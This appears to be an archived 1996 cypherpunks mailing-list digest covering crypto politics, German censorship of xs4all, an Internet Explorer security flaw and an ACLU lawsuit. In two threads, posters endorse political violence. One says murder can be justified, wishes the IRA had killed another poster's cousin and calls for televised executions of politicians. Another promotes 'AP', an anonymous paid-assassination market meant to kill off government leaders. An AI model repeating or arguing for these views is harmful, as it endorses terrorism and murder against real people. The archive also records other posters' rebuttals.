From: omegaman at bigeasy.com (Omegaman)
Date: Tue, 24 Sep 1996 13:32:01 +0800
Subject: Snake-Oil FAQ
In-Reply-To: <3245E50C.4B10@gte.net>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 22 Sep 1996, Dale Thorn wrote:

> Maybe I shouldn't have tried to (slightly) change the subject. It was
> my thought that someone could encourage the person(s) who wanted to do a
> Snake-Oil product list to generalize the list, to be a more scholarly
> reference, and not just a blacklist. Since the original(?) proposal
> concerned actual products, and not just techniques which fit into neatly
> identifiable categories, that might justify a Consumer Reports type of
> review list for these products.
>

One of the goals of a "Snake-Oil FAQ" as proposed is to gain as wide a distribution as possible. If a "blacklist" of products is put into the FAQ, or if actual existing products are referred to in a negative light, the distribution of this FAQ will be severely limited.

I also think that as a whole, this project is a good idea and a good mini-project.
As crypto continues to spread, it is inevitable that "bad" crypto will spread as well. While these products will surely come and go with the phases of the moon, some people will undoubtedly be suckered and soured towards crypto-technology in general. (sarcasm) "If it saves just one...." (\sarcasm)

It has been said before that the best way to counter noise is with signal. If one of the primary goals of cypherpunks is to encourage the widespread use of strong crypto, then, by extension, it is important to discourage the spread of "crappy crypto."

_______________________________________________________________
Omegaman
PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2 59 0A 01 E3 AF 81 94 63
Send e-mail with "get key" in the "Subject:" field to get a copy of my public key
_______________________________________________________________

From tcmay at got.net Mon Sep 23 22:32:56 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 24 Sep 1996 13:32:56 +0800
Subject: We removed radikal 154 from xs4all :(
Message-ID:

At 9:46 PM 9/23/96, Mike McNally wrote:
>place. While the Germans are off blocking other sites, xs4all can
>re-host the material as soon as the Bundesfeds unblock their
                                     ^^^^^^^^^^

Beavis and Bundesfed?

--Tim

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway." From merriman at amaonline.com Mon Sep 23 23:42:08 1996 From: merriman at amaonline.com (merriman at amaonline.com) Date: Tue, 24 Sep 1996 14:42:08 +0800 Subject: No Subject Message-ID: <199609240458.VAA29786@toad.com> >From cypherpunks-errors at toad.com Tue Sep 24 00:24:32 1996 Return-Path: cypherpunks-errors at toad.com Received: from toad.com (toad.com [140.174.2.1]) by oak.westol.com (8.7.5/8.6.9) with ESMTP id AAA16311 for ; Tue, 24 Sep 1996 00:24:29 -0400 Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id KAA22710 for cypherpunks-outgoing; Mon, 23 Sep 1996 10:53:36 -0700 (PDT) Received: from hal.amaonline.com ([207.0.45.76]) by toad.com (8.7.5/8.7.3) with SMTP id KAA22705 for ; Mon, 23 Sep 1996 10:53:14 -0700 (PDT) Date: Mon, 23 Sep 1996 10:53:14 -0700 (PDT) Message-Id: <199609231753.KAA22705 at toad.com> Received: from [207.0.45.102] (HELO PINKRNGR) by hal.amaonline.com (AltaVista Mail F1.0/1.0 BL18 listener) id 0000_0070_3246_ce50_809a; Mon, 23 Sep 1996 12:52:16 -0500 From: "David K. Merriman" To: cypherpunks at toad.com Reply-To: merriman at amaonline.com X-Priority: Normal Subject: Paradox db passwords/encryption X-Mailer: Pronto Secure [Ver 1.03] MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Pgprequest: signed Sender: owner-cypherpunks at toad.com Precedence: bulk X-UIDL: 843540068.001 -----BEGIN PGP SIGNED MESSAGE----- To: cypherpunks at toad.com Reply-To: merriman at amaonline.com Date: Mon Sep 23 12:52:32 1996 Sorry to disturb everyone, but I've got a questions that is (gasp!) immediately related to crypto: Does anyone have any info on the encryption used in the Paradox (4.5 for Win) database? I've got someone that has an encrypted (well, password-protected :-) Paradox database that needs some maintenance, and the person that knew the password is now - shall we say - 'no longer with them'. 
Right now, doesn't matter if it's something clever, or a brute-force hack; they just need to get into the tables and such.

Dave Merriman
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PGP Email welcome, encouraged, and PREFERRED.
Visit my web site at http://www.shellback.com/p/merriman for my PGP key and fingerprint
"What is the sound of one hand clapping in a forest with no one there to hear it?"
I use Pronto Secure (tm) PGP-fluent Email software for Windows

From DMiskell at envirolink.org Mon Sep 23 23:49:12 1996
From: DMiskell at envirolink.org (Daniel Miskell)
Date: Tue, 24 Sep 1996 14:49:12 +0800
Subject: A daily warning regarding Tim ... [edited]
Message-ID: <199609240243.WAA16832@envirolink.org>

The not allowing unsubscribed individuals to post is logical, for a time. But that basically outlaws anon remailers that don't allow you to send to an account, and a lot of them don't, from my limited understanding. Besides, if we set up the list to ban people who are 'undesirable', instead of just using our own killfiles to do the dirty work for the list, then what is to stop someone from banning you? Sure, you move on to another list, but, personally, I wouldn't want it done to me, and so I would not do it to someone else. But, like I said, personal killfiles are more than encouraged. It resolves these kinds of conflicts a lot faster and cleaner than debating who and who should not be banned.

Daniel.
From Wyntermute at postoffice.worldnet.att.net Mon Sep 23 23:50:29 1996 From: Wyntermute at postoffice.worldnet.att.net (Wyntermute at postoffice.worldnet.att.net) Date: Tue, 24 Sep 1996 14:50:29 +0800 Subject: No Subject Message-ID: <19960924051112.AAA28933@Darkstar> test message From gary at systemics.com Tue Sep 24 00:00:04 1996 From: gary at systemics.com (gary at systemics.com) Date: Tue, 24 Sep 1996 15:00:04 +0800 Subject: No Subject Message-ID: <199609240458.VAA29783@toad.com> >From cypherpunks-errors at toad.com Tue Sep 24 00:06:48 1996 Return-Path: cypherpunks-errors at toad.com Received: from toad.com (toad.com [140.174.2.1]) by oak.westol.com (8.7.5/8.6.9) with ESMTP id AAA15647 for ; Tue, 24 Sep 1996 00:06:48 -0400 Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id LAA23286 for cypherpunks-outgoing; Mon, 23 Sep 1996 11:26:23 -0700 (PDT) Received: from smokey.systemics.com (smokey.systemics.com [193.67.124.65]) by toad.com (8.7.5/8.7.3) with SMTP id LAA23280 for ; Mon, 23 Sep 1996 11:26:14 -0700 (PDT) Received: from internal-mail.systemics.com (kp1HuXoYZnhRYRtN5QVHP59VjfL1vS2Z at internal-mail.systemics.com [193.67.124.74]) by smokey.systemics.com (8.6.12/8.6.12) with ESMTP id UAA10263 for ; Mon, 23 Sep 1996 20:26:00 +0200 Received: (from gary at localhost) by internal-mail.systemics.com id UAA16049 for cypherpunks at toad.com; Mon, 23 Sep 1996 20:26:40 +0200 Date: Mon, 23 Sep 1996 20:26:40 +0200 From: Gary Howland Message-Id: <199609231826.UAA16049 at internal-mail.systemics.com> To: cypherpunks at toad.com Reply-To: gary at systemics.com Subject: Security flaw in Microsft Explorer Sender: owner-cypherpunks at toad.com Precedence: bulk X-UIDL: 843538362.000 Status: U Program compromises IE security By Nick Wingfield September 23, 1996, 10:45 a.m. PT A start-up Internet company has posted a program on the Net that could allow Web sites to bypass the security controls in Internet Explorer, CNET has learned. 
The company, InfoSpace, created a program aimed at Net search engines such as Lycos and Excite that want to become the default search engine in Microsoft's Internet Explorer 3.0. But the program, which is actually featured on the Lycos Web site, manages to circumvent Explorer's security warning window--an action that could let InfoSpace sneak programs onto a user's personal computer without warning. Although the InfoSpace program apparently was not created with malicious intent, it underscores the fragility of Internet Explorer's security defenses, as well as broader security issues related to downloading software over the Internet. The InfoSpace program sidesteps a security feature in Internet Explorer, called Authenticode, which is designed to allow users to verify the origins of a piece of software code, such as an ActiveX control, a script, or a plug-in. The Authenticode system requires a user to entrust the developer of a program, whether it's InfoSpace, Lotus Development, or IBM, not to install viruses or other destructive programs on the user's system. Although Authenticode does not prevent software developers from creating such programs, they can be held legally accountable for bad code. That's because the programs contain "digital signatures," a sort of ID card that allows perpetrators to be tracked down by law enforcement agencies. Microsoft works with VeriSign to provide digital signatures for programs. Last month, VeriSign took matters into its own hands by asking a developer, Fred McLain, to remove an ActiveX control called Exploder from his Web site. The Exploder control was designed to crash a user's computer after downloading. "Code signing is not a guarantee of code quality," Charles Fitzgerald, a product manager at Microsoft said. "It's an accountability trail." As with all digitally signed programs, users are offered the option to accept or to reject the InfoSpace program before installing it on their systems. 
Users are also offered the option to bypass the Authenticode warning window for all InfoSpace programs in the future. But the company's program registers InfoSpace as a "trusted publisher" in Explorer, effectively opening the browser to intrusions. The operation is akin to inviting a guest over to your house for dinner and having them copy the key to your front door without permission. InfoSpace executives denied that there was any malice intended in its program, adding that it has provided Lycos with an updated version of the code. Lycos plans to post the new program later this evening, according to InfoSpace. "It was a bug that got incorporated into the production code," InfoSpace CEO Naveen Jain said. Lycos CEO Bob Davis said he was not aware of the bug in the InfoSpace program and could not comment on it. The program is identified as Lycos Quick Search on the search engine's site. However, Microsoft officials expressed concern, saying it is hard to defend against once a user has consented to download code from the Net. "Clearly their software is doing something a tad aggressive," said Rob Price, a group program manager for Internet security at Microsoft."[With Authenticode], users are making a one-time trust decision, this is a persistent trust decision." Microsoft argued that Explorer provides better security than Netscape Communications' Navigator, which does not currently allow digital signatures on plug-ins. In Explorer, users are warned before downloading code even if the program does not contain a digital signature, though the source of the program is not identified. In contrast to plug-in software and ActiveX controls, Java applets are prevented from damaging a user's computer through built-in restrictions in the Java Virtual Machine. "Java is the model for dynamic executable content on the Net," said Eric Greenberg, group security manager at Netscape. 
From shamrock at netcom.com Tue Sep 24 00:01:47 1996 From: shamrock at netcom.com (Lucky Green) Date: Tue, 24 Sep 1996 15:01:47 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: <32472AF1.1417@vail.tivoli.com> Message-ID: On Mon, 23 Sep 1996, Mike McNally wrote: > Lucky Green wrote: > > > > Yes, you can be sued for sexual harrasment for trying to pick up a > > stranger in a bar, should that stranger still feel bothered by your > > advances while at work the next day. > > > > The courts have ruled, > > To paraphrase the probably-great Charles Haynes, "my bullshit meter > is jiggling up near the red line". Is there really a case of a person > being convicted of workplace sexual harassment against somebody they > didn't work with? Not that I am aware of. But the test *clearly* is how it makes you feel once at work, regardless of other circumstances. --Lucky From camcc at abraxis.com Tue Sep 24 00:01:54 1996 From: camcc at abraxis.com (camcc at abraxis.com) Date: Tue, 24 Sep 1996 15:01:54 +0800 Subject: No Subject Message-ID: <199609240458.VAA29784@toad.com> >From cypherpunks-errors at toad.com Tue Sep 24 00:20:12 1996 Return-Path: cypherpunks-errors at toad.com Received: from toad.com (toad.com [140.174.2.1]) by oak.westol.com (8.7.5/8.6.9) with ESMTP id AAA16114 for ; Tue, 24 Sep 1996 00:20:11 -0400 Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id MAA24022 for cypherpunks-outgoing; Mon, 23 Sep 1996 12:43:09 -0700 (PDT) Received: from smtp1.abraxis.com (SMTP1.ABRAXIS.COM [206.155.199.210]) by toad.com (8.7.5/8.7.3) with SMTP id MAA23992 for ; Mon, 23 Sep 1996 12:41:23 -0700 (PDT) From: camcc at abraxis.com Received: from [206.155.199.39] by smtp1.abraxis.com (NTMail 3.01.03) id ua044324; Mon, 23 Sep 1996 15:44:56 -0400 Message-Id: <2.2.32.19960923194301.0069bebc at smtp1.abraxis.com> X-Sender: camcc at smtp1.abraxis.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: 
Mon, 23 Sep 1996 15:43:01 -0400 To: cypherpunks at toad.com Reply-To: camcc at abraxis.com Subject: GA HB1630 Lawsuit: Press Advisory Sender: owner-cypherpunks at toad.com Precedence: bulk X-UIDL: 843538926.000 Status: U >X-Sender: rcostner at intergate.net >Reply-To: efg-action at ninja.techwood.org > >Joint Media Advisory: > >AMERICAN CIVIL LIBERTIES UNION >ELECTRONIC FRONTIERS GEORGIA >REP. MITCHELL KAYE > >Groups to Mount Legal Challenge to Georgia Cyberspace Law > >FOR IMMEDIATE RELEASE Contact: See list below >Friday, September 20, 1996 > > ATLANTA, GA-- -The American Civil Liberties Union, Electronic Frontiers >Georgia, Georgia State Representative Mitchell Kaye (R-Marietta) and others >will be holding a news conference on Tuesday, September 24 at 10:30 a.m., >immediately after filing a lawsuit seeking a preliminary injunction against a >Georgia law barring communications in cyberspace. > > The suit names Governor Zell Miller and Attorney General Michael Bowers as >defendants, and will be filed on behalf of 13 plaintiffs. >------------------------------------------------------------------------------ >-------------------------------------- > > WHO: > >Attorneys Ann Beeson (ACLU) and Scott McClain (Bondurant, Mixson & Elmore) > >Plaintiffs Robert Costner (executive director, Electronic Frontiers Georgia); >Jeff Graham (AIDS Survival Project); Rep. Mitchell Kaye (GA House of >Representatives); Bonnie Nadri (The Page Factory); Teresa Nelson (ACLU of >Georgia); Eric Van Pelt (Atlanta Veterans Alliance); Josh Riley (individual >plaintiff); and Kimberly LyleWilson (Atlanta Freethought Society). > > WHAT: > >News conference to announce filing of legal challenge to Georgia >cyberspace law. > > WHEN: > >Tuesday, September 24, 10:30 a.m. 
> > WHERE: > >ACLU of Georgia >142 Mitchell Street SW (at Peachtree), Suite 301, Atlanta >(404) 523-6201 > >Note: Copies of the brief and plaintiff affidavits will be available at the >news conference and online at the EFGA website, and >through the ACLU's website and America Online site >(keyword: ACLU). > >Contacts: Teresa Nelson, ACLU GA Ann Beeson, national ACLU: 404-523-6201 > Robert Costner, EFGA: 770-512-8746 > Rep. Mitchell Kaye: 770-998-2399 > Scott McClain: 404-881-4138 > Emily Whitfield, ACLU Nat'l Press Office: 212-944-9800 x426 > > > From Wyntermute at postoffice.worldnet.att.net Tue Sep 24 00:12:05 1996 From: Wyntermute at postoffice.worldnet.att.net (Wyntermute at postoffice.worldnet.att.net) Date: Tue, 24 Sep 1996 15:12:05 +0800 Subject: No Subject Message-ID: <19960924051414.AAA29725@Darkstar> test From frissell at panix.com Tue Sep 24 00:18:39 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 24 Sep 1996 15:18:39 +0800 Subject: crypto anarchy vs AP Message-ID: <3.0b19.32.19960923225428.00b29a50@panix.com> At 11:26 AM 9/23/96 -0700, Clint Barnett wrote: >ever read "1984"? the appearance of a free lifestyle is most definitely >not a free lifestyle. I am hardly a friend of the state, and far from >being an advocate of the church, but multinational corporations running >the world for their own fun and profit makes my sphincter clench. The lifestyle in "1984" didn't appear free. Someone who thinks that an institution like the government that gains all its revenue by force and is armed with nukes is less dangerous than institutions that are shrinking in size and gain most of their revenue by voluntary exchange is nuts. DCF From nobody at cypherpunks.ca Tue Sep 24 00:25:51 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Tue, 24 Sep 1996 15:25:51 +0800 Subject: The daily word of advice regarding Tim Mayo Message-ID: <199609240520.WAA22684@abraham.cs.berkeley.edu> What a joy to make a public mockery of Tim Mayo! 
From dlv at bwalk.dm.com Tue Sep 24 00:34:50 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 24 Sep 1996 15:34:50 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <9609232148.AA17056@vesuvius.ai.mit.edu> Message-ID: <6XJquD10w165w@bwalk.dm.com> hallam at vesuvius.ai.mit.edu writes: > So Jim Bell is opposed to "truly random attacks on ordinary citizens" > Its this type ofappoligia for terrorism that disgusts me utterly. There is no such thing as an "ordinary citizen". When the U.S. commits war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, Iraq, and elsewhere, every American taxpayer is an accomplice and a fair game. Likewise, any Britih subject is fair game for IRA's self-defense against centuries of British genocide and oppression. > He is calling for murder but wants to dress it up in whatever psychotic > justifications he can. Murder can be justified. > He is also completely wrong. When the IRA attemoted to assasinate my cousin > I was in no way intimidated and neither was he. He continued as a senior > poitician for over a decade despite continued danger. I can think of no > less effective method of bringing about change in attitudes. I think public executions of politicians would be a more effective way to indimidate the potential successors than covert assassinations. Joe Stalin liked public hangings toward the end of his life. I'd rather see the bastards hang in a nationally televised ceremony, live from the Rose Garden, but I guess -- whatever gets the job done. It's a pity the IRA didn't nail your cousin. I wish them better luck next time. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From m5 at tivoli.com Tue Sep 24 00:44:38 1996 From: m5 at tivoli.com (Mike McNally) Date: Tue, 24 Sep 1996 15:44:38 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: Message-ID: <32470540.6B28@tivoli.com> Timothy C. 
May wrote: > > At 6:31 PM 9/23/96, tank wrote: > >Hi all, > > > >We have temporary removed radikal 154 from xs4all. > > Unfortunately, this means that Germany wins. I partially agree, but then again the stuff is mirrored all over the place. While the Germans are off blocking other sites, xs4all can re-host the material as soon as the Bundesfeds unblock their addresses. Eventually, I suspect it'd get pretty embarrassing for the censors. ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! From jimbell at pacifier.com Tue Sep 24 00:46:29 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 24 Sep 1996 15:46:29 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: <199609240135.SAA23298@mail.pacifier.com> At 05:48 PM 9/23/96 -0400, hallam at vesuvius.ai.mit.edu wrote: > >So Jim Bell is opposed to "truly random attacks on ordinary citizens" >Its this type ofappoligia for terrorism that disgusts me utterly. >He is calling for murder but wants to dress it up in whatever psychotic >justifications he can. >He is also completely wrong. When the IRA attemoted to assasinate my cousin >I was in no way intimidated and neither was he. He continued as a senior >poitician for over a decade despite continued danger. I can think of no >less effective method of bringing about change in attitudes. And he, along with others, failed to solve the problems as well. Is this progress? >I am in no way intimidated by Bell either. He is a kook and I don;t think it >he is worth further consideration. > Phill For the record, if an AP-type system were to operate it would: 1. Make it impossible for the British to continue to station troops in Northern Ireland, an eventuality that I suppose Phill resists. However, it would also: 2. 
Make it impossible and unnecessary for the British to have any troops anywhere, because it would eliminate its government and military. It would no longer be a country, merely an island with people living there. 3. Make it unnecessary in Northern Ireland to protect the Catholics from the Protestants, or the Protestants from the Catholics, because the trouble-makers from both (all?) sides would be quickly erased from the scene. Nobody would rule anybody. Nobody COULD rule anybody. All factions would either be peaceful or dead, their choice. No political advantage could be gained by violence, because all politics would have ceased. 4. Make it unnecessary and pointless for Northern Ireland to re-unify with Ireland, because likewise the government and military of Ireland would dissolve, as well as all political structure in that land as well. In short, the only reasons that the current problems are maintained in Northern Ireland and Britain would be eliminated by the advent of AP. So who is the "kook," really? Jim Bell jimbell at pacifier.com From deviant at pooh-corner.com Tue Sep 24 01:22:02 1996 From: deviant at pooh-corner.com (The Deviant) Date: Tue, 24 Sep 1996 16:22:02 +0800 Subject: Taking crypto out of the U.S. In-Reply-To: Message-ID: On Mon, 23 Sep 1996, Hamish wrote: > Date: Mon, 23 Sep 1996 18:18:15 -0400 (EDT) > From: Hamish > To: cypherpunks at toad.com > Subject: Taking crypto out of the U.S. > > Soon I am going to be going overseas to Japan, and I want to take > my notebook with me so I can keep up with everything, however, I have > encrypted my hard drive and usually encrypt my mail. Is this in violation > of the ITAR to keep everything the same when I go over? > > > Not if nobody else is allowed to use i (but some theif could cause you to violate ITAR ;)... the real question is: do they have 120 VAC plugs in Japan? ... --Deviant Slowly and surely the unix crept up on the Nintendo user ... 
From wb8foz at nrk.com Tue Sep 24 01:33:40 1996 From: wb8foz at nrk.com (David Lesher) Date: Tue, 24 Sep 1996 16:33:40 +0800 Subject: We removed radikal 154 from xs4all In-Reply-To: <199609232122.OAA15542@atropos.c2.org> Message-ID: <199609240330.XAA00710@nrk.com> > > > Unfortunately, this means that Germany wins. > > How does this mean that Germany wins? "radikal 154" is still > available all over the world, at almost 50 mirror sites, I beleive > (including http://www.c2.net/radikal/), which are *not* blocked by > Germany. Indeed, that's the Xenu "Statue of Liberty" technique, used against the Cult of $pamology. Helena runs around stepping on ants [some of whom turn out to be fire-ants]; only to find 4x as many as before she started... -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From wombat at mcfeely.bsfs.org Tue Sep 24 01:35:44 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 24 Sep 1996 16:35:44 +0800 Subject: [NOISE] Re: possible solution to cyber S/N In-Reply-To: <199609232354.SAA00523@manifold.algebra.com> Message-ID: > Globally: Vladimir's recommendations lead to a vicious circle of > "tyranny" of popular sites because hte more people view a site, the more > will follow and the site's "attractiveness" rating will go even higher. > Nobody goes there anymore. It's too crowded. - Yoggi Bera ;) From unicorn at schloss.li Tue Sep 24 01:36:19 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 24 Sep 1996 16:36:19 +0800 Subject: Taking crypto out of the U.S. In-Reply-To: Message-ID: On Mon, 23 Sep 1996, Hamish wrote: > Soon I am going to be going overseas to Japan, and I want to take > my notebook with me so I can keep up with everything, however, I have > encrypted my hard drive and usually encrypt my mail. 
Is this in violation > of the ITAR to keep everything the same when I go over? > I'm not rendering a legal opinion here, but I will try to make your position clear. 1> It depends 2> It depends 3> It depends. First, what encryption type is it? Some encryption is freely exportable. Second, is it just encrypted data you're exporting, or also the means to encrypt/decrypt it. (It's not clear from your post) Third, do you plan on telling anyone what's on your drive? -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From tank at xs4all.nl Tue Sep 24 01:37:46 1996 From: tank at xs4all.nl (tank) Date: Tue, 24 Sep 1996 16:37:46 +0800 Subject: We removed radikal 154 from xs4all :( Message-ID: <199609231831.UAA21914@xs1.xs4all.nl> Hi all, We have temporarily removed radikal 154 from xs4all. We did this because the German ICTF and BAW continued to stop IP-traffic to and from xs4all. They not only blocked the web-server (with more than 3100 homepages from users and companies) but 2 Class C-networks. The pressure was too high for both xs4all and its customers (more than 12500 users). They were not able to mail, ftp, www in large parts of Germany. The 47 mirrors of the radikal site made it possible for us to remove issue 154 from xs4all. All 47 mirrors are still accessible by German netizens. There is no filtering of traffic to these servers. The ICTF and BAW now have to decide if they will block all ip-traffic to and from all 47 servers, or they have to stop their censoring actions. In both cases we will put the issue radikal 154 back online. We are still calling for more mirrors. The more mirrors, the more pressure on the ICTF and BAW to stop their censorship. You can get a copy of the whole archive from ftp://utopia.hacktic.nl/pub/replay/pub/incoming or from one of the mirror-sites.
regards, henk (SPG) From sandfort at crl.com Tue Sep 24 02:06:16 1996 From: sandfort at crl.com (Sandy Sandfort) Date: Tue, 24 Sep 1996 17:06:16 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <6XJquD10w165w@bwalk.dm.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > There is no such thing as an "ordinary citizen". When the U.S. commits > war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, Iraq, and elsewhere, > every American taxpayer is an accomplice and a fair game. Illogical collectivist claptrap. When a taxpayer is targeted by terrorists, he has been victimized twice--first by the government that stole his money, second by the terrorist that punished him for the (alleged) acts others commited with that money. If a mugger buys a gun with the money he took from me, am I then responsible for the murder he commits with it? Clearly not. This line of "reasoning" is nothing more than a sad variant of the old, "blame the victim" game. For shame. Let's bring this back to crypto for a moment. Dimitri's "logic" must necessarily lead one to the conclusion that Cypherpunks (at least those in the US) are responsible for whatever draconian restrictions "our" government puts on free speech, crypto or whatever. John Gilmore, Philip Zimmermann, Whit Diffie and others will be chagrined to learn this, I'm sure. Dimitri needs to learn what it means to be an adult. Everyone is totally responsible for what they do, but ONLY for what THEY do. No one is responsible for the unassisted, willful acts of others. 
S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From jimbell at pacifier.com Tue Sep 24 02:21:13 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 24 Sep 1996 17:21:13 +0800 Subject: crypto anarchy vs AP Message-ID: <199609240700.AAA16178@mail.pacifier.com> At 11:26 AM 9/23/96 -0700, Clint Barnett wrote: >>to create the appearance of as free a life style as they can for >>individuals > >ever read "1984"? the appearance of a free lifestyle is most definitely >not a free lifestyle. I am hardly a friend of the state, and far from >being an advocate of the church, but multinational corporations running >the world for their own fun and profit makes my sphincter clench. I think you're under a mis-impression here. At least in the libertarian circles where I do most of my political discussion, it is generally suspected that corporations grow large and powerful primarily BECAUSE OF assistance by and due to the policies of government. (heavy regulation favors large companies by keeping down small competitors, etc) Of course, that cause/effect relationship is intentionally hidden, and most of the public sees the show put on which appears to have the opposite effect: Anti-trust lawsuits, etc. Over time, the public is gulled into the false belief that if you get rid of the government, you get rid of the "only think that stands between us and the multi-national corporations." They believe this because the only government actions they see and recognize are anti-corporation. If they were aware of the truth, they'd realize that these large corporations are actually afraid of a free market, and that the companies consider big government to be their friends.. Just look at an excellent example: Intel versus IBM. Intel used to be this tiny upstart chip company from the Bay area and IBM was smokestack America. Now, Intel is the biggest (by dollar volume, anyway) chip company in the world and IBM is, well, considerably cut back from its heyday. 
At least in hindsight, IBM would have been "smart" to squash Intel, or buy it up, or have the government over-regulate it. Jim Bell jimbell at pacifier.com From wombat at mcfeely.bsfs.org Tue Sep 24 02:24:03 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Tue, 24 Sep 1996 17:24:03 +0800 Subject: Snooping ISP admin?? In-Reply-To: <199609232112.QAA07155@xanadu.io.com> Message-ID: On Mon, 23 Sep 1996, Douglas R. Floyd wrote: > > > > Greetings All, > > > > Question for the group: I have encountered a situation that causes me > > to believe an ISP is snooping through encrypted mail. It seems that > > PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have > > encountered "POP3 account in use by another user" several times in the > > past few days and I am the only user... wondering if that "in use" > > message is the result of a clumsy sysadmin being caught with his hand > > in the cookie jar. Any thoughts from the group??? If those more > > knowledgeable than I deem these NOISE... my sincere apologies. > > An admin could just copy the mail spool file to a safer place, then read > through at their leisure. > > Unless it's someone totally clueless (which some ISP's are), I doubt that > they are pulling off the pop3d. It could be that your mail spool file is > locked by a mail transport agent, and that is why that error message is > occurring. > > Any thoughts? > This is probably somewhat system dependent, but I'm guessing that any lock on the file "could" generate the message that the account is "in use." Could be a lock which was not cleared from a previous session, a backup system that wants exclusive reads on the files, etc., not necessarily another POP3 session. As for the sysadmin side, yes, there are other, easier methods of getting at the mail file. OTOH, could be someone inside an ISP (or not), who does not have access to the file structure, but did somehow obtain passwords through other means.
Any ISP of any size will have different levels of access for different employees, and the graveyard helpdesk shift can get fairly dull ... It is more than likely a system-related problem with a file lock, though. I'd suggest changing your password, and making sure that you don't use a dictionary word or obvious permutation thereof. If you continue to have problems, check with the ISP about your "technical difficulties", and see what they come up with. Just my $.02 - r.w. From jimbell at pacifier.com Tue Sep 24 02:34:15 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 24 Sep 1996 17:34:15 +0800 Subject: AP [NOISE] Message-ID: <199609240323.UAA02037@mail.pacifier.com> At 10:10 PM 9/23/96 -0400, hallam at vesuvius.ai.mit.edu wrote: > >Jim, > > I do support the presence of troops in Northern Ireland and >do not consider that to contradict my belief that there should be a >united, autonamous Ireland. I do not believe that the "loyalists" are >in fact loyal to the British way of life, any more than the KKK are >representative of the US south. > > Troops are in Northern Ireland for a very simple and depressing >reason. People like Jim want to impose their will on others by force. Quite the contrary. I want to reduce, as much as possible, the ability of people to impose their will on others by force. Read my essay. Eventually you might figure it out. The difference is, I recognize that if you set up a government to try to minimize non-government violence and coercion, you'll get just that: A minimization of NON-GOVERNMENT violence and coercion, at the expense of vastly increasing the GOVERNMENT kind. And I don't consider that progress at all. >Despite prolonged attempts by each faction to assasinate the leaders of >the other they have been unsuccessful. I suppose it didn't occur to you that this is EXACTLY why this dispute has gone on so long? What if instead of being "unsuccessful," these attempts suddenly became 100% successful. Easy, even. 
Just push a button and the top guy on the other side dies. And you could do this as often as, say, once an hour, with all of his replacements. And the other side can do the same to your leadership. How long do you think it would be before people decide that maybe, they DON'T want to "step up to the plate" and get killed for the sake of their cause? >If terrorists trained by Lybia >and Syria are unable to assasinate at will then we can be sure thaqt Jim's >band of kooks is not going to get any further. Which means that you clearly don't understand the motivating factor of a large, totally anonymous e-cash payment. And why should a handful of "terrorists" be successful? The "AP gang" will consist of 5 BILLION people who want to collect the reward, including anyone close to the target. It'll put an entirely new, ominous meaning into the phrase, "Friends and Family"! B^) >If the integration of both Irealand and the UK into the European >Union has not ended the situation the complete lack of government >will not either. Hell, the whole reason for this dispute is heirarchical social systems, in this case governments and religions! And adding the European Union merely increases the problem by adding to the heirarchy. My solution eliminates the heirarchy, totally. Why, then, should EU's failure imply a failure by AP? It's the diametrically opposite tactic. > It is suprising that someone from the press has not seized upon Jims >ideas as cause for another cyber-scare. I suspect this is because people >like Markof are somewhat more responsible. No, it's probably because they think, nervously, that I might just be right. Even that won't necessarily want to make them want to associate their names with my ideas. If they truly understand them, they'll recognize that it'll happen regardless of the amount of approval it gets from polite society. 
